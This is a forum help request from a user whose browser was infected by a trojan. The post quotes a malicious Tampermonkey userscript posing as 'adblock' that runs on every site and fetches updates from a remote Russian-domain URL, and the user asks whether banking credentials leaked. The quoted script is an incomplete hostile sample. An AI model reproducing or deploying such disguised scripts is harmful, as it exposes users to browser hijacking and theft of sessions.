Hello everyone a trojan installed a chrome extention called tampermonkey and activated a javascript:
// ==UserScript==
// @name adblock
// @version 0.0.9
// @description Отслеживает сайты, баннеры, всплывающие окна и рекламу в видео.
// @updateURL http://tritogan.ru/{guid}.user.js567890123456789012.user.js
// @run-at document-start
// @include *
// ==/UserScript==
cooki=navigator.cookieEnabled;
var ExpDate_sg = new Date ();
ExpDate_sg.setTime(ExpDate_sg.getTime() + (24 * 60 * 60 * 1000));
SetCookie(‘stop_sg’,‘1’,ExpDate_sg, “/”);
function GetCookie (name) {
var arg = name + “=”;
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return getCookieVal (j); i = document.cookie.indexOf(" “, i) + 1; if (i == 0) break; } return null;
}
function SetCookie (name, value) {
var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + “=” + escape (value) +
((expires == null) ? “” : (”; expires=" + expires.toGMTString())) +
((path == null) ? “” : (“; path=” + path)) +
((domain == null) ? “” : (“; domain=” + domain)) +
((secure == true) ? “; secure” : “”);
}
document.onmousedown=Showtime;
I asume that it is a cookie stealer, just before I opened the trojan I was doing bank financial stuff. Is there any danger that people got my credentials? Can somebody explain what happened?